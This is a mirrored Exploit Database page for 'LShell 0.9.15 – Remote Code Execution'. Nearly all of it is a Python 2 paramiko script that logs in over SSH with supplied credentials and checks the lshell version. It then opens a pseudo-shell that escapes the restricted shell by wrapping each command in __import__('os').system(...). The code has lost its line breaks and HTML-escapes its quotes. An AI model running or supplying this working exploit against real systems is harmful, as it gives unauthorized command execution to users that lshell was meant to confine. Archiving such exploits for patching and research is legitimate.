LShell 0.9.15 – Remote Code Execution

• Exploit Database
• 96 阅读

• 作者： drone
  日期： 2012-12-30
• 类别：

  • remote
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/39632/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87

  import paramiko import traceback from time import sleep   # # Exploit lshell pathing vulnerability in <= 0.9.15. # Runs commands on the remote system. # @dronesec #   if len(sys.argv) < 4: print &apos;%s: [USER] [PW] [IP] {opt: port}&apos;%(sys.argv[0]) sys.exit(1)   try: print &apos;[!] .............................&apos; print &apos;[!] lshell <= 0.9.15 remote shell.&apos; print &apos;[!] note: you can also ssh in and execute \&apos;/bin/bash\&apos;&apos; print &apos;[!] .............................&apos; print &apos;[!] Checking host %s...&apos;%(sys.argv[3]) ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) if len(sys.argv) == 5: ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2]) else: ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])     # verify lshell channel = ssh.invoke_shell() while not channel.recv_ready(): sleep(1) ret = channel.recv(2048)   channel.send(&apos;help help\n&apos;) while not channel.recv_ready(): sleep(1) ret = channel.recv(2048)   if not &apos;lshell&apos; in ret: if &apos;forbidden&apos; in ret: print &apos;[-] Looks like we can\&apos;t execute SSH commands&apos; else: print &apos;[-] Environment is not lshell&apos; sys.exit(1)   # verify vulnerable version channel.send(&apos;sudo\n&apos;) while not channel.recv_ready(): sleep(1) ret = channel.recv(2048) if not &apos;Traceback&apos; in ret: print &apos;[-] lshell version not vulnerable.&apos; sys.exit(1) channel.close() ssh.close()   # exec shell print &apos;[+] vulnerable lshell found, preparing pseudo-shell...&apos; if len(sys.argv) == 5: ssh.connect(sys.argv[3],port=int(sys.argv[4]),username=sys.argv[1],password=sys.argv[2]) else: ssh.connect(sys.argv[3],username=sys.argv[1],password=sys.argv[2])   while True: cmd = raw_input(&apos;$ &apos;)   # breaks paramiko if cmd[0] is &apos;/&apos;: print &apos;[!] Running binaries won\&apos;t work!&apos; continue   cmd = cmd.replace("&apos;", r"\&apos;") cmd = &apos;echo __import__(\&apos;os\&apos;).system(\&apos;%s\&apos;)&apos;%(cmd.replace(&apos; &apos;,r&apos;\t&apos;)) if len(cmd) > 1: if &apos;quit&apos; in cmd or &apos;exit&apos; in cmd: break (stdin,stdout,stderr) = ssh.exec_command(cmd) out = stdout.read() print out.strip() except paramiko.AuthenticationException: print &apos;[-] Authentication to %s failed.&apos;%sys.argv[3] except Exception, e: print &apos;[-] Error: &apos;, e print type(e) traceback.print_exc(file=sys.stdout) finally: channel.close() ssh.close()